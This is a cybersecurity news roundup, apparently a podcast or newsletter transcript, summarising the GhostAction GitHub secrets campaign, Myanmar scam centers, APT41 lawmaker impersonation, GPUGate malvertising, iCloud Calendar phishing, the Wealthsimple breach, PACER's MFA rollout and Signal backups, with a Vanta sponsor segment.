In today’s cybersecurity news…
GhostAction campaign targets GitHub
On September 2nd, GitGuardian discovered that the account for a GitHub project they use internally, FastUUID, was compromised. The compromised account enumerated secrets from workflow files, then hardcoded secret names into the workflows . Looking into that particular compromise, the company found indicators of compromise indicating a larger campaign dubbed GhostAction, impacting 327 GitHub users and 817 repositories. This campaign leaked over 3,300 secrets, including AWS instances, DockerHub tokens, and NPM tokens. GitGuardian notified GitHub, PyPI, and NPM security teams about the campaign, with many already reverting repositories.
Scam centers see huge growth in Myanmar
The Guardian reports that according to new research and drone footage, the number of industrial-scale scam call centers on the Thai-Myanmar border has more than doubled since the Myanmar military coup in 2021, with construction of new facilities underway at an estimated rate of 55 hectares a month. These facilities are run by criminal organizations, with Thai police estimating at least 100,000 trafficked people in these border facilities, lured in with the promise of jobs. These elaborate facilities are heavily fortified and contain luxury housing for management, serving as social proof for investment scams.
Spies impersonate US lawmaker to target trade groups
The Wall Street Journal’s sources say a campaign tracked to the Chinese-backed APT 41 orchestrated a campaign in July posing as US Representative John Moolenarr, chairman of the House Committee on the Chinese Communist Party. These emails were sent from a non-governmental address to trade groups, government agencies, and law firms with an attachment that appeared to be draft legislation and a request for input. An investigation by Google’s Mandiant found that clicking on the attachments would attempt to install a backdoor. At the time the emails were sent, the US was set to begin trade talks with China in Sweden.
(Security Week, WSJ)
GPUGate targets IT firms
Researchers at Arctic Wolf detailed a new campaign with a new take on malicious advertising dubbed GPUGate. This campaign uses paid ads on Google and other search engines, which embed a GitHub commit in the page URL. This contains an altered link that points to the threat actors’ infrastructure. This initially points to a 128MB Microsoft Software Installer, while a GPU-gated decryption routine keeps its payload encrypted on systems without GPU resources. This would stymie analysis of the malware on a virtual machine or other sandbox without GPU resources. The payloads indicate the operators speak Russian, and the campaign exclusively targets IT and software development companies in Western Europe.
We know that real-time visibility is critical for security, but when it comes to our GRC programs…we rely on point-in-time checks. But more than 9,000 companies have continuous visibility into their controls with Vanta.
Vanta brings automation to evidence collection across over 35 frameworks, like SOC 2 and ISO 27001. They also centralize key workflows like policies, access reviews, and reporting, and helps you get security questionnaires done 5 times faster with AI.
Now that’s…a new way to GRC.
Get started at Vanta.com/headlines.
iCloud Calendar used to send phishing emails
Bleeping Computer received word of this scam from a reader, who received a message from noreply@email.apple.com advising that their PayPal account was billed and providing support numbers to dispute the transaction. Calling the number would lead to the scammers attempting to install some “helpful” software so the customer can log into their PayPal account to initiate a refund. The attackers sent this message as an iCloud Calendar event to a Microsoft 365 email address. This address was itself a mailing list for a list of potential victims. While the phishing lure is an extremely tried and true approach, the way it was delivered successfully passed SPF, DMARC, and DKIM email security checks.
Wealthsimple confirms data breach
The Canadian fintech firm said the breach exposed sensitive information on “less than 1%” of its clients. 30,000 customers had government IDs, Social Insurance numbers, and account numbers exposed. The incident was caused by a compromised third-party software provider and was detected on August 30th. All impacted customers were notified as of September 5th. Wealthsimple will offer the industry standard two years of credit and darkweb monitoring, and encourage all of its customers to enable 2FA.
PACER struggles with MFA rollout
PACER is the US government-run system used by US courts to access court documents; it’s a critical backbone of the legal system. Back in April, PACER announced MFA would become mandatory on accounts that file documents or manage cases, and sent out a notice in August reminding users to enroll by the end of the year. According to reporting by the Register, some attorneys trying to enroll are seeing long website freezes when logging on, with support lines hammered, leading to multi-hour wait times. As a result, PACER lifted its end-of-year deadline and said it is switching to a phased MFA rollout. Users should not enroll until prompted by the system.
Signal lets you back that chat up
The popular encrypted message app announced that a beta version of chat backups is coming to Android, as both free and paid offerings. Users can back up 100MB of chats and the last 45 days of media for free, while 100GB of media backups will also be available as a paid feature for $1.99 a month. Users receive a 64-character recovery key for chat backups that is generated on the device. Signal does not link backups to a user or a payment method. Cross-platform availability is in the works. This marks Signals’ first paid feature. Until now, it’s only accepted donations.